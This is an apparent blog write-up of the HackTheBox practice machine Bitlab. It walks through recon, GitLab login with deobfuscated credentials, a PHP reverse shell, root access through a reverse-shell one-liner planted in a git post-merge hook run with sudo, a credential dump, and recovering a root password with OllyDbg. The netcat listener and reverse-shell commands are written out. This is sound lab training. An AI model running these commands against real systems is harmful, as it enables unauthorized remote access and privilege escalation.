Bitlab — HackTheBox

Aleksi Kistauri
6 min readJan 11, 2020

This is a write-up on how I solved Bitlab from HacktheBox.

Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.

about this box:

Bitlab is a medium difficulty box. Bitlab was such a good and fun box because it demonstrated real-life setups and vulnerabilities not because of old versions but because of how boxes are setup (over permission-binaries, reconfigured or over-exposed network services, people sticking keys in places they really should not be, etc).


Use Nmap to scan the target ports:

nmap Network exploration tool and security / port scanner
-sV (Version detection)
-sC Performs a script scan using the default set of scripts.
-o Output file.

Only two ports are opened 22 and 80. We have SSH on port 22 and Gitlab on port 80.

Without directory enumeration with the Gobuster we already know that there is robots.txt which has some disallowed entries.

If we look at the /help/ entry we will see bookmarks.html

Which contains some elements, One of them contains obfuscated data

After deobfuscation, we have a Username and Password.


And we are in!

After the login into Gitlab we know that we have 2 projects and snippets. and with user clave, we probably can edit index.php in Administrator/profile project.

Okay, time to get the Reverse shell.

Grab PHP reverse shell from Pentestermonkey — reverse shell

Then, get the IP address with ifconfig tun0

After getting the IP address change the IP address in the reverse shell

And merge it:

After that, Set Netcat listener with:

nc -nvlp 1234

and to trigger the shell visit:

And we are in!

We can execute git pull without root access with a www-data user.

To get the reverse shell as root, all we need is to add bash reverse shell in .git/hooks/post-merge and after git pull, it will execute the command.

Let’s grab the profile(we can edit it as a clave) project on /tmp/

Its all set.

Let’s get the reverse shell as a root!

Add bash Shebang in .git/hooks/post-merge
echo “#!/bin/bash” > .git/hooks/post-merge

Append reverse shell in .git/hooks/post-merge

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1235 >/tmp/f” >> .git/hooks/post-merge

And give it execute permission

chmod +x .git/hooks/post-merge

Set up the listener with Netcat:

nc -nvlp 1235

And run:

sudo git pull

Whoops. The repository is already up to date.

To trigger it we need to make some change on the repository.


And merge it.

Okay, now we can trigger it.

sudo git pull

And we are root without getting the user.


let’s forgot about it and get the user from www-data.

Remember snippets from Gitlab? let’s check it.

Bingo! we have one snippet with a database name, username, and password.

The snippet executes query which returns all information from profiles table.

I believe the simplest way to execute it is that change the index.php again (with the snippet) and just trigger it with browser.

By itself, it won't give us any information from the query.

Simple googling and we already know how to show all the results.

Commit, merge and open it with the browser.

Oh boy. We got the credentials.

Huh? maybe the password is the whole text?

Okay SSH without decoding the value.

And we are in, We got the user clave.

Some reverse-engineering

We have RemoteConnection.exe in /home/clave/

let’s Download it with Netcat and do some reverse-engineering with OllyDbg.

Set up a listener on our machine with:

nc -l -p 1234 > RemoteConnection.exe

and Send the file with:

nc -w 3 < RemoteConnection.exe

And finally, check integrity with the md5sum command.

We got the file.

Before debugging let’s run strings on it.

Mm, nothing really interesting. Maybe it does some SSH Connection? IDK.

let’s see it with OllyDbg.

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. —

So, it does some comparison and after that, it (if it matches) opens the connection.

Open it with OllyDbg and set the breakpoint on JNZ SHORT 00331662

JNZ is jump condition.

And run it.

We have the command in ESI Registry which contains root password.

And we are root, AGAIN!

I hope you enjoyed!

Follow me for future posts.

Twitter —